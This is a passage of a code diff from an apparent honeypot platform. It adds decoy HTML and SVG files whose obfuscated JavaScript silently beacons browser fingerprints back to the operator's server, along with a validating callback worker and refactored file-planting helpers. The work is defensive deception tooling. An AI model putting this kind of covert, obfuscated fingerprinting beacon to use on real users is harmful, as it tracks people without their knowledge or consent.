+ """ + seed = _seed_from_token(callback_token) + options = _config_from_seed(seed) + payload = json.dumps({"code": code, "options": options}) + try: + proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv + [_NODE_BIN, str(_HELPER)], + input=payload, capture_output=True, text=True, + timeout=_TIMEOUT_S, check=False, + ) + except FileNotFoundError as e: + raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e + except subprocess.TimeoutExpired as e: + raise ObfuscatorError("javascript-obfuscator timed out") from e + if proc.returncode != 0: + raise ObfuscatorError( + f"javascript-obfuscator failed rc={proc.returncode} " + f"stderr={proc.stderr.strip()[:400]}" + ) + out = proc.stdout + if not out.strip(): + raise ObfuscatorError("javascript-obfuscator returned empty output") + return out + + +def render_fingerprint_js( + *, callback_token: str, http_base: str, mint_uuid: str, nonce: str, +) -> str: + """Build the obfuscated fingerprint JS for a single mint. + + Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and + ``{{MINT_NONCE}}`` in the payload template, then runs it through + :func:`obfuscate` with a seed derived from the callback token. + The nonce is appended as ``&k=`` on every beacon URL the JS emits; + the worker rejects fingerprint payloads whose ``?k=`` doesn't match + the row's :attr:`CanaryToken.fingerprint_nonce`. 
+ """ + template = _PAYLOAD.read_text(encoding="utf-8") + beacon = f"{http_base.rstrip('/')}/c/{callback_token}" + src = ( + template + .replace("{{BEACON_URL}}", beacon) + .replace("{{MINT_UUID}}", mint_uuid) + .replace("{{MINT_NONCE}}", nonce) + ) + return obfuscate(src, callback_token=callback_token) diff --git a/decnet/canary/package.json b/decnet/canary/package.json new file mode 100644 index 00000000..8ecf93fb --- /dev/null +++ b/decnet/canary/package.json @@ -0,0 +1,10 @@ +{ + "name": "decnet-canary-obfuscator", + "version": "0.1.0", + "private": true, + "description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.", + "main": "_obfuscate_helper.js", + "dependencies": { + "javascript-obfuscator": "^5.4.2" + } +} diff --git a/decnet/canary/paths.py b/decnet/canary/paths.py index 5700ad0f..b2b731a5 100644 --- a/decnet/canary/paths.py +++ b/decnet/canary/paths.py @@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = { "honeydoc": "/home/{user}/Documents/quarterly_report.html", "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx", "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf", + "fingerprint_html": "/home/{user}/Documents/asset_directory.html", + "fingerprint_svg": "/home/{user}/Documents/network_topology.svg", } _WINDOWS_DEFAULTS: dict[str, str] = { @@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = { "honeydoc": "/home/{user}/Documents/quarterly_report.html", "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx", "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf", + "fingerprint_html": "/home/{user}/Documents/asset_directory.html", + "fingerprint_svg": "/home/{user}/Documents/network_topology.svg", } diff --git a/decnet/canary/planter.py b/decnet/canary/planter.py index 6beae78b..8a80bc2b 100644 --- a/decnet/canary/planter.py +++ b/decnet/canary/planter.py @@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire. 
""" from __future__ import annotations -import asyncio -import base64 import os -import shlex -import time +from datetime import datetime, timedelta, timezone from secrets import token_urlsafe from typing import Any, Iterable, Optional @@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus from decnet.canary.base import CanaryArtifact, CanaryContext from decnet.canary.factory import get_generator from decnet.canary.paths import default_path_for +from decnet.decky_io import ( + delete_file_from_container, + resolve_topology_container, + write_file_to_container, +) from decnet.logging import get_logger from decnet.web.db.repository import BaseRepository log = get_logger("canary.planter") -_DOCKER = "docker" -_TIMEOUT = 8.0 # Container suffix — matches the orchestrator SSH driver's convention # (``-ssh``). Canary placement always happens through the # ssh container because every decky has one and it carries the most @@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str: return f"{decky_name}{_SSH_CONTAINER_SUFFIX}" -def _dirname(path: str) -> str: - idx = path.rfind("/") - if idx <= 0: - return "/" - return path[:idx] - - -async def _run( - argv: list[str], *, stdin_bytes: Optional[bytes] = None, -) -> tuple[int, str, str]: - try: - proc = await asyncio.create_subprocess_exec( - *argv, - stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None, - stdout=asyncio.subprocess.PIPE, - stderr=asyncio.subprocess.PIPE, - ) - except FileNotFoundError as exc: - return 127, "", f"argv[0] not found: {exc}" - try: - stdout, stderr = await asyncio.wait_for( - proc.communicate(input=stdin_bytes), timeout=_TIMEOUT, - ) - except asyncio.TimeoutError: - try: - proc.kill() - except ProcessLookupError: - pass - return 124, "", "timeout" - return ( - proc.returncode if proc.returncode is not None else -1, - stdout.decode("utf-8", "replace"), - stderr.decode("utf-8", "replace"), - ) - - -def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]: - 
"""Compose the ``sh -c`` script + stdin payload for one artifact. - - Binary safety: we base64-encode on the host and stream the result - over stdin to ``base64 -d`` inside the container, so the bytes - never touch the argv (kernel ARG_MAX would reject anything larger - than ~128KB-2MB depending on the host). Both ``base64`` (coreutils) - and ``touch -d @`` are present on every Linux base image - we ship, so there's no per-distro branching. - """ - encoded = base64.b64encode(artifact.content) - mtime = int(time.time() + artifact.mtime_offset) - mode_str = oct(artifact.mode)[2:] - parts = [ - f"mkdir -p {shlex.quote(_dirname(artifact.path))}", - f"base64 -d > {shlex.quote(artifact.path)}", - f"chmod {mode_str} {shlex.quote(artifact.path)}", - f"touch -d @{mtime} {shlex.quote(artifact.path)}", - ] - return " && ".join(parts), encoded +# resolve_topology_container is re-exported from decky_io for back-compat +# with callers (tests, deploy hook) that imported it from this module +# before the decky_io extraction. +__all__ = [ + "plant", + "revoke", + "resolve_topology_container", + "seed_baseline", + "seed_baseline_topology", +] async def _publish( @@ -139,6 +93,7 @@ async def plant( repo: Optional[BaseRepository] = None, publish: bool = True, bus: Optional[BaseBus] = None, + container: Optional[str] = None, ) -> tuple[bool, Optional[str]]: """Write *artifact* into the decky's ssh container. @@ -157,13 +112,12 @@ async def plant( await repo.update_canary_token_state(token_uuid, "failed", err) return False, err - sh_cmd, stdin_payload = _build_plant_command(artifact) - # ``-i`` keeps stdin attached so base64 -d inside the container can - # consume the encoded payload streamed from the host. 
- argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd] - rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload) - success = rc == 0 - error = None if success else (stderr.strip()[:256] or f"rc={rc}") + target_container = container or _container_for(decky_name) + mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset) + success, error = await write_file_to_container( + target_container, artifact.path, artifact.content, + mode=artifact.mode, mtime=mtime, + ) if repo is not None: if success: @@ -182,8 +136,8 @@ async def plant( if not success: log.warning( - "canary.plant failed decky=%s token=%s rc=%d stderr=%r", - decky_name, token_uuid, rc, stderr[:120], + "canary.plant failed decky=%s token=%s container=%s err=%r", + decky_name, token_uuid, target_container, error, ) return success, error @@ -196,6 +150,7 @@ async def revoke( repo: Optional[BaseRepository] = None, publish: bool = True, bus: Optional[BaseBus] = None, + container: Optional[str] = None, ) -> tuple[bool, Optional[str]]: """Best-effort unlink + state transition + bus publish. @@ -203,11 +158,10 @@ async def revoke( the file is gone after the call (whether we deleted it or it was already missing); only docker / container-down errors return False. 
""" - sh_cmd = f"rm -f {shlex.quote(placement_path)}" - argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd] - rc, _stdout, stderr = await _run(argv) - success = rc == 0 - error = None if success else (stderr.strip()[:256] or f"rc={rc}") + target_container = container or _container_for(decky_name) + success, error = await delete_file_from_container( + target_container, placement_path, + ) if repo is not None: await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None) @@ -250,6 +204,7 @@ async def seed_baseline( persona: str = "linux", created_by: str = "system", bus: Optional[BaseBus] = None, + container: Optional[str] = None, ) -> list[dict[str, Any]]: """Plant the configured baseline canary set on one decky. @@ -293,9 +248,59 @@ async def seed_baseline( await plant( decky_name, artifact, token_uuid=token_uuid, repo=repo, publish=True, bus=bus, + container=container, ) out.append({ "token_uuid": token_uuid, "generator": gen_name, "kind": kind, "callback_token": slug, "placement_path": artifact.path, }) return out + + +async def seed_baseline_topology( + repo: BaseRepository, + topology_id: str, + *, + created_by: str = "system", + bus: Optional[BaseBus] = None, +) -> list[dict[str, Any]]: + """Plant baseline canaries on every decky in a MazeNET topology. + + Mirrors :func:`seed_baseline` for the topology path. Container name + resolution uses :func:`resolve_topology_container` since topology + deckies may not have an ssh service — in that case we target the + base container instead. + + Best-effort: failures on any single decky are logged inside + :func:`plant`; the deploy hook treats the return value as + informational. Returns a flat list of per-token dicts (with an added + ``decky_name`` key) across all deckies. 
+ """ + from decnet.topology.persistence import hydrate + + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + log.warning( + "canary.seed_baseline_topology: topology %s not found", topology_id, + ) + return [] + + out: list[dict[str, Any]] = [] + for decky in hydrated["deckies"]: + cfg = decky.get("decky_config") or {} + decky_name = cfg.get("name") or decky.get("name") + if not decky_name: + continue + services = decky.get("services") or [] + container = resolve_topology_container(topology_id, decky_name, services) + # MazeNET deckies don't carry an OS persona today; default to + # linux (every base image we ship is Linux). + rows = await seed_baseline( + decky_name, repo, + persona="linux", created_by=created_by, bus=bus, + container=container, + ) + for r in rows: + r["decky_name"] = decky_name + out.append(r) + return out diff --git a/decnet/canary/worker.py b/decnet/canary/worker.py index 8218136d..3eea2573 100644 --- a/decnet/canary/worker.py +++ b/decnet/canary/worker.py @@ -26,9 +26,14 @@ crashes loudly rather than masking failures. from __future__ import annotations import asyncio +import base64 +import binascii +import json import os +import time +import uuid from datetime import datetime, timezone -from typing import Optional +from typing import Any, Optional from fastapi import FastAPI, Request, Response @@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex( ) +# Namespace used by fingerprint generators to derive mint UUID. +# Must stay in sync with fingerprint_html._MINT_NAMESPACE. +_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d") + +# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists. +# Maps (token_uuid, src_ip) -> list of monotonic timestamps. +# Not shared across worker restarts or processes — acceptable for MVP. 
+_FP_RATE_WINDOW_S = 60 +_FP_RATE_LIMIT = 30 +_fp_rate_buckets: dict[tuple[str, str], list[float]] = {} + + +def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool: + key = (token_uuid, src_ip) + now = time.monotonic() + cutoff = now - _FP_RATE_WINDOW_S + bucket = _fp_rate_buckets.get(key, []) + bucket = [t for t in bucket if t > cutoff] + if len(bucket) >= _FP_RATE_LIMIT: + _fp_rate_buckets[key] = bucket + return False + bucket.append(now) + _fp_rate_buckets[key] = bucket + return True + + +def _is_valid_fp_shape(fp: dict) -> bool: + """Layer B — structural sanity check on a decoded fingerprint blob.""" + if not isinstance(fp.get("mint"), str) or not fp["mint"]: + return False + known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"} + present = sum(1 for k in known_keys if isinstance(fp.get(k), dict)) + return present >= 3 + + def _http_base() -> str: return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/") @@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI: @app.get("/c/{slug}") async def callback(slug: str, request: Request) -> Response: + raw_nonce = request.query_params.get("k") + fp_meta, parsed_fp = _extract_fingerprint(request.query_params) + merged_headers = dict(request.headers) + if fp_meta: + merged_headers.update(fp_meta) await _record_hit( repo, bus, slug=slug, @@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI: user_agent=request.headers.get("user-agent"), request_path=str(request.url.path), dns_qname=None, - raw_headers=dict(request.headers), + raw_headers=merged_headers, + parsed_fp=parsed_fp, + raw_nonce=raw_nonce, ) # Always 200 with a tiny image so the attacker's client sees # a "success" — same return regardless of whether the slug is @@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI: return app +# Per-chunk size cap. 
Real fingerprints fit in one ~3KB GET; honest +# overflow is handled via chunking (s/i/n + d). Anything larger than +# this on a single request is junk, so we drop it instead of letting an +# attacker inflate a trigger row indefinitely. +_FP_CHUNK_MAX = 8 * 1024 + + +def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]: + """Decode fingerprint-payload query params into (meta_dict, parsed_fp). + + The obfuscated browser payload may send three shapes on ``GET /c/``: + + * ``?o=1`` — bare-open beacon, fired before fingerprinting starts. + * ``?d=`` — single-shot fingerprint dump. + * ``?s=&i=&n=&d=`` — chunked dump. + + Returns a tuple of: + - ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers. + - ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None`` + when there's no ``?d=`` or decoding fails. + """ + out: dict[str, Any] = {} + parsed_fp: Optional[dict] = None + if not qp: + return out, parsed_fp + o = qp.get("o") if hasattr(qp, "get") else None + if o: + out["_fp_open"] = "1" + d = qp.get("d") if hasattr(qp, "get") else None + if not d: + return out, parsed_fp + if len(d) > _FP_CHUNK_MAX: + out["_fp_oversize"] = "1" + return out, parsed_fp + + sid = qp.get("s") + idx = qp.get("i") + total = qp.get("n") + if sid and idx and total: + out["_fp_sid"] = sid + out["_fp_idx"] = idx + out["_fp_total"] = total + out["_fp_chunk"] = d + return out, parsed_fp + + # Single-shot: decode and pass back as parsed_fp; validation runs in + # _record_hit after token lookup so we have the stored nonce at hand. 
+ try: + padded = d + "=" * (-len(d) % 4) + raw = base64.urlsafe_b64decode(padded.encode("ascii")) + parsed = json.loads(raw.decode("utf-8")) + except (binascii.Error, ValueError, UnicodeDecodeError): + out["_fp_decode_error"] = "1" + return out, parsed_fp + if isinstance(parsed, dict): + parsed_fp = parsed + else: + out["_fp_decode_error"] = "1" + return out, parsed_fp + + def _client_ip(request: Request) -> str: # Honor X-Forwarded-For if the operator deployed behind a reverse # proxy. Take the leftmost address in the chain; everything after @@ -154,16 +262,58 @@ async def _record_hit( request_path: Optional[str], dns_qname: Optional[str], raw_headers: Optional[dict], + parsed_fp: Optional[dict] = None, + raw_nonce: Optional[str] = None, ) -> None: """Resolve slug -> token, persist a trigger, publish on the bus. Unknown slugs are silently swallowed: returning the same response for known and unknown slugs is the stealth posture, and persisting every random scan would clutter the DB. + + When *parsed_fp* is present (single-shot fingerprint decode succeeded), + it is validated through four layers before being merged into raw_headers: + A) nonce match against CanaryToken.fingerprint_nonce, + B) structural shape check, + C) mint UUID consistency, + D) per-(token, IP) rate limit. + Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag. + The trigger row always lands regardless — the GET hit is itself forensic. 
""" token = await repo.get_canary_token_by_slug(slug) if token is None: return + + final_headers: dict[str, Any] = dict(raw_headers or {}) + + if parsed_fp is not None: + stored_nonce: Optional[str] = token.get("fingerprint_nonce") + + # Layer A — nonce + if stored_nonce is not None and raw_nonce != stored_nonce: + final_headers["_fp_invalid_nonce"] = "1" + parsed_fp = None + + # Layer B — shape (only when nonce passed or no nonce enforced) + if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp): + final_headers["_fp_invalid_shape"] = "1" + parsed_fp = None + + # Layer C — mint UUID consistency + if parsed_fp is not None: + expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug)) + if parsed_fp.get("mint") != expected_mint: + final_headers["_fp_invalid_mint"] = "1" + parsed_fp = None + + # Layer D — rate limit + if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip): + final_headers["_fp_rate_limited"] = "1" + parsed_fp = None + + if parsed_fp is not None: + final_headers["_fp"] = parsed_fp + trigger_id = await repo.record_canary_trigger({ "token_uuid": token["uuid"], "occurred_at": datetime.now(timezone.utc), @@ -171,7 +321,7 @@ async def _record_hit( "user_agent": user_agent, "request_path": request_path, "dns_qname": dns_qname, - "raw_headers": raw_headers or {}, + "raw_headers": final_headers, }) try: await bus.publish( @@ -189,6 +339,22 @@ async def _record_hit( except Exception as e: # noqa: BLE001 — best effort log.warning("canary.triggered publish failed slug=%s err=%s", slug, e) + # Auto-deregister fingerprint canaries after the first valid fingerprint + # is collected. Slug goes dark; the stealth posture means the attacker + # sees the same 200 + GIF on the next hit — nothing reveals the revocation. + # Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain + # http/dns canaries are NOT auto-revoked. 
+ if parsed_fp is not None and token.get("fingerprint_nonce") is not None: + try: + await repo.update_canary_token_state(token["uuid"], "revoked") + await bus.publish( + topics.canary(token["uuid"], topics.CANARY_REVOKED), + {"token_id": token["uuid"], "trigger_id": trigger_id, + "reason": "fingerprint_collected"}, + ) + except Exception as e: # noqa: BLE001 — trigger row already landed; best effort + log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e) + # ---------------------------- DNS surface -------------------------------- diff --git a/decnet/cli/canary.py b/decnet/cli/canary.py index 87af60ea..25011b0e 100644 --- a/decnet/cli/canary.py +++ b/decnet/cli/canary.py @@ -1,8 +1,13 @@ """``decnet canary`` — HTTP + DNS callback receiver for canary tokens. -Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a -``@app.command(name="canary")`` Typer entry point that delegates to -:func:`decnet.canary.worker.run`. +Two entry points share this module: + +* ``decnet canary`` — runs the worker process. Mirrors the shape of + :mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service`` + systemd unit so its argv must stay stable. +* ``decnet canary-install-toolchain`` — provisions the Node side of + the fingerprint-canary obfuscator. Idempotent; safe to call from + the API service unit's ``ExecStartPre``. Not master-only — any host that hosts deckies can run its own canary worker (the bus events stay local; the webhook worker on @@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``). """ from __future__ import annotations +import shutil +import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer +from pathlib import Path + import typer from . 
import utils as _utils from .utils import console, log +_TOOLCHAIN_TIMEOUT_S = 180 + def register(app: typer.Typer) -> None: @app.command(name="canary") @@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None: asyncio.run(run()) except KeyboardInterrupt: console.print("\n[yellow]Canary worker stopped.[/]") + + @app.command(name="canary-install-toolchain") + def canary_install_toolchain( + npm_bin: str = typer.Option( + "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.", + ), + ) -> None: + """Install the Node-side toolchain used by fingerprint canaries. + + Runs ``npm install --omit=dev`` under the installed ``decnet/canary/`` + directory so the obfuscator's helper script can ``require()`` + ``javascript-obfuscator`` at mint time. Requires Node >= 18. + + Idempotent: re-running on an already-installed tree is fast + (npm short-circuits when ``node_modules/`` is up-to-date). + """ + import decnet.canary as _canary_pkg + canary_dir = Path(_canary_pkg.__file__).resolve().parent + if not (canary_dir / "package.json").is_file(): + console.print( + f"[red]canary package.json not found under {canary_dir}; " + "wheel may be missing the JS toolchain payload.[/]" + ) + raise typer.Exit(code=2) + if shutil.which(npm_bin) is None: + console.print( + f"[red]npm executable {npm_bin!r} not found on PATH. 
" + "Install Node >= 18 and re-run.[/]" + ) + raise typer.Exit(code=2) + console.print( + f"[cyan]installing canary toolchain[/] in {canary_dir}", + ) + try: + proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above + [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"], + cwd=str(canary_dir), + capture_output=True, text=True, + timeout=_TOOLCHAIN_TIMEOUT_S, check=False, + ) + except subprocess.TimeoutExpired: + console.print("[red]npm install timed out after 3 minutes[/]") + raise typer.Exit(code=3) from None + if proc.returncode != 0: + console.print( + f"[red]npm install failed rc={proc.returncode}[/]\n" + f"{proc.stderr.strip()}" + ) + raise typer.Exit(code=proc.returncode) + console.print("[green]canary toolchain ready[/]") diff --git a/decnet/cli/init.py b/decnet/cli/init.py index adff99cc..f1fc0f5a 100644 --- a/decnet/cli/init.py +++ b/decnet/cli/init.py @@ -74,6 +74,7 @@ _CONFIG_PLACEHOLDER = """\ # master-host = 10.0.0.1 # syslog-port = 6514 # swarmctl-port = 8770 +# swarmctl-host = 127.0.0.1 # [logging] # system-log = /var/log/decnet/decnet.system.log diff --git a/decnet/cli/swarmctl.py b/decnet/cli/swarmctl.py index 687823c9..78fb9c00 100644 --- a/decnet/cli/swarmctl.py +++ b/decnet/cli/swarmctl.py @@ -16,8 +16,16 @@ from .utils import console, log def register(app: typer.Typer) -> None: @app.command() def swarmctl( - port: int = typer.Option(8770, "--port", help="Port for the swarm controller"), - host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"), + port: int = typer.Option( + 8770, "--port", + envvar="DECNET_SWARMCTL_PORT", + help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.", + ), + host: str = typer.Option( + "127.0.0.1", "--host", + envvar="DECNET_SWARMCTL_HOST", + help="Bind address for the swarm controller. 
Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.", + ), daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"), no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"), tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"), diff --git a/decnet/cli/topology.py b/decnet/cli/topology.py index f7cfe122..5f9f88ee 100644 --- a/decnet/cli/topology.py +++ b/decnet/cli/topology.py @@ -233,8 +233,8 @@ def _delete( topo = await repo.get_topology(topology_id) if topo is None: return False, "not-found" - if topo["status"] in _RUNNING: - return False, str(topo["status"]) + if topo.status in _RUNNING: + return False, str(topo.status) ok = await repo.delete_topology_cascade(topology_id) return ok, None diff --git a/decnet/clustering/campaign/impl/similarity.py b/decnet/clustering/campaign/impl/similarity.py index 2aa5bba8..38101405 100644 --- a/decnet/clustering/campaign/impl/similarity.py +++ b/decnet/clustering/campaign/impl/similarity.py @@ -342,7 +342,7 @@ def combined_campaign_weight( # ─── Adapter for synthetic-fixture tests ──────────────────────────────────── -def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def] +def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: """Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``. 
Treats one ``SyntheticAttacker`` as one identity — adequate for diff --git a/decnet/clustering/impl/similarity.py b/decnet/clustering/impl/similarity.py index 3e69ac37..9122eb69 100644 --- a/decnet/clustering/impl/similarity.py +++ b/decnet/clustering/impl/similarity.py @@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float: # ─── Adapter for the synthetic-corpus tests ───────────────────────────────── -def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def] +def from_synthetic(att) -> Observation: """Build an :class:`Observation` from a ``SyntheticAttacker``. Lives here so test code doesn't import the factory shape into the diff --git a/decnet/collector/worker.py b/decnet/collector/worker.py index 0d8717b6..d744cec1 100644 --- a/decnet/collector/worker.py +++ b/decnet/collector/worker.py @@ -75,6 +75,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset( ) _RL_MAX_ENTRIES: int = 10_000 +# APP-NAMEs we never want to see in the ingestion stream — native unix +# daemons that share a container with a DECNET service. Their logs are +# noise: sshd's "Failed password for root from X" duplicates the +# auth-helper's structured `auth_attempt` event, pam_unix repeats it +# again, and CRON/systemd/etc. say nothing about attacker behavior. +# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list). +_DROP_APPS: frozenset[str] = frozenset( + a.strip() + for a in os.environ.get( + "DECNET_COLLECTOR_DROP_APPS", + "sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon", + ).split(",") + if a.strip() +) + _rl_lock: threading.Lock = threading.Lock() _rl_last: dict[tuple[str, str, str, str], float] = {} @@ -82,10 +97,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {} def _should_ingest(parsed: dict[str, Any]) -> bool: """ Return True if this parsed event should be written to the JSON ingestion - stream. 
Rate-limited connection-lifecycle events return False when another - event with the same (attacker_ip, decky, service, event_type) was emitted - inside the dedup window. + stream. Drops native unix daemon noise (sshd, pam_unix, …) outright; + rate-limits connection-lifecycle events within a dedup window. """ + if parsed.get("service", "") in _DROP_APPS: + return False event_type = parsed.get("event_type", "") if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES: return True @@ -220,6 +236,12 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]: except ValueError: ts_formatted = ts_raw + # Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with + # "CMD ") get event_type rewritten to "command". `fields` stays empty + # so the frontend's msg-based pill rendering doesn't double up. + if event_type == "-" and msg.startswith("CMD "): + event_type = "command" + return { "timestamp": ts_formatted, "decky": decky, diff --git a/decnet/config_ini.py b/decnet/config_ini.py index a3747003..7db44abd 100644 --- a/decnet/config_ini.py +++ b/decnet/config_ini.py @@ -39,6 +39,7 @@ Shape:: master-host = 10.0.0.1 # required on agents syslog-port = 6514 swarmctl-port = 8770 + swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl` [logging] system-log = /var/log/decnet/decnet.system.log @@ -120,6 +121,7 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = { "master-host": "DECNET_SWARM_MASTER_HOST", "syslog-port": "DECNET_SWARM_SYSLOG_PORT", "swarmctl-port": "DECNET_SWARMCTL_PORT", + "swarmctl-host": "DECNET_SWARMCTL_HOST", }, "logging": { "system-log": "DECNET_SYSTEM_LOGS", diff --git a/decnet/correlation/parser.py b/decnet/correlation/parser.py index 9740d490..65ace509 100644 --- a/decnet/correlation/parser.py +++ b/decnet/correlation/parser.py @@ -137,6 +137,19 @@ def parse_line(line: str) -> LogEvent | None: msg = tail.group(1).strip() if tail else "" attacker_ip = _extract_attacker_ip(fields, msg) + # Free-form bash PROMPT_COMMAND lines arrive with 
MSGID=NIL or MSGID=command + # and a body like `CMD uid=0 user=root src=… pwd=… cmd=`. + # Without this rewrite they're invisible to the behavioral profiler, which + # filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger + # invocation uses --msgid command, so we must also handle the non-nil case. + if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields: + event_type = "command" + head, sep, cmd_rest = msg[4:].partition("cmd=") + for k, v in re.findall(r'(\w+)=(\S+)', head): + fields.setdefault(k, v) + if sep: + fields.setdefault("command", cmd_rest) + # Mutator-emitted transitions arrive on the same ingest stream but # belong in the substrate-state index, not the per-IP attacker one. kind: EventKind = ( diff --git a/decnet/correlation/reuse_worker.py b/decnet/correlation/reuse_worker.py index f1a5be5f..67d18929 100644 --- a/decnet/correlation/reuse_worker.py +++ b/decnet/correlation/reuse_worker.py @@ -70,7 +70,7 @@ async def run_reuse_loop( wake_tasks.append(asyncio.create_task( _run_control_listener_signal(bus, "reuse-correlator"), )) - except Exception as exc: # noqa: BLE001 + except Exception as exc: log.warning( "reuse correlator: bus unavailable, running in poll-only mode: %s", exc, @@ -86,7 +86,7 @@ async def run_reuse_loop( results = await engine.correlate_credential_reuse( repo, min_targets=min_targets, ) - except Exception: # noqa: BLE001 + except Exception: log.exception("reuse correlator: tick failed") results = [] @@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None: wake.set() except asyncio.CancelledError: raise - except Exception as exc: # noqa: BLE001 + except Exception as exc: log.warning( "reuse correlator: subscriber for %s died (%s); falling back to poll", pattern, exc, diff --git a/decnet/decky_io/__init__.py b/decnet/decky_io/__init__.py new file mode 100644 index 00000000..ef0008fe --- /dev/null +++ b/decnet/decky_io/__init__.py @@ -0,0 +1,39 @@ 
+"""Shared primitives for writing/deleting files inside running deckies. + +The canary planter and the orchestrator SSH driver both need to drop +bytes into a decky container's filesystem, then sometimes unlink them. +The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places +before this module existed. + +Public API: + +* :func:`write_file_to_container` — write bytes at a path, set mode, + optionally backdate mtime. +* :func:`delete_file_from_container` — best-effort ``rm -f``. +* :func:`resolve_topology_container` — pick the right docker container + for a MazeNET decky based on its services list. +* :func:`resolve_decky_container` — async helper that takes + ``(decky_name, topology_id?)``, hydrates the topology when needed, + and returns the docker container name. + +Container resolution conventions are documented in +:mod:`decnet.topology.compose`; we mirror them here without taking +a runtime dependency on the compose generator. +""" +from __future__ import annotations + +from .resolve import ( + resolve_decky_container, + resolve_topology_container, +) +from .write import ( + delete_file_from_container, + write_file_to_container, +) + +__all__ = [ + "delete_file_from_container", + "resolve_decky_container", + "resolve_topology_container", + "write_file_to_container", +] diff --git a/decnet/decky_io/resolve.py b/decnet/decky_io/resolve.py new file mode 100644 index 00000000..271ee491 --- /dev/null +++ b/decnet/decky_io/resolve.py @@ -0,0 +1,72 @@ +"""Decky-name → docker container name resolution. + +Two scopes: + +* **Fleet**: every fleet decky has a ``ssh`` service container named + ``-ssh`` (see :mod:`decnet.services.ssh`). We always + target it because it carries the most realistic filesystem layout. +* **MazeNET (topology)**: same ``-ssh`` convention when the + decky exposes the ssh service; otherwise the decky's base container + named ``decnet_t__`` (matches + :func:`decnet.topology.compose._container_name`). 
